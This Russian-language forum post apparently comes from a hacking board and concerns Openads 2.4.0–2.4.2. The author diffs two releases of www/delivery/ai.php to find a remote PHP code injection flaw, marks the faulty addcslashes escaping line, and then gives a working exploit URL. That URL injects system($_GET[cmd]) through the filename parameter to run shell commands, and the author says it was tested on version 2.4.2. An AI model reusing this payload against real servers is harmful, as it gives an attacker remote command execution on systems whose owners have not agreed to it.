Существует уязвимость: Openads 2.4.0 <= x <= 2.4.2 Vulnerability: Remote PHP code injection and execution Cплойта не нашел, собственно как и описание уязвимости. Скачал Openads 2.4.2 и Openads 2.4.3 PHP: diff -r openads-2.4.2/www/delivery/ai.php openads-2.4.3/www/delivery/ai.php 28c28 < $Id: ai.php 12787 2007-11-26 10:00:33Z andrzej.swedrzynski@openads.org $ --- > $Id: ai.php 14232 2008-01-09 17:30:42Z andrzej.swedrzynski@openads.org $ 1094,1097c1094,1100 < } elseif (preg_match('/^.+:.+$/', $what)) { < list($whatName, $whatValue) = explode(':', $what); < if ($whatName == 'zone') { < $whatName = 'zoneid'; --- > } elseif (preg_match('/^(.+):(.+)$/', $what, $matches)) { > switch ($matches[1]) { > case 'zoneid': > case 'zone': $zoneid = $matches[2]; break; > case 'bannerid': $bannerid = $matches[2]; break; > case 'campaignid': $campaignid = $matches[2]; break; > case 'clientid': $clientid = $matches[2]; break; 1099,1100d1101 < global $$whatName; < $$whatName = $whatValue; 1329c1330 < $cache_literal .= "$"."cache_name = '".addcslashes($name, "'")."';\n"; <- тут уязвимость --- > $cache_literal .= "$"."cache_name = '".addcslashes($name, "\\'")."';\n"; После изучения функций этого скрипта написал сплоит: http://localhost/www/delivery/ai.php?filename=antichat.jpg';system($_GET[cmd]);/*&contenttype=antichat&cmd=ls -la проверял на Openads 2.4.2
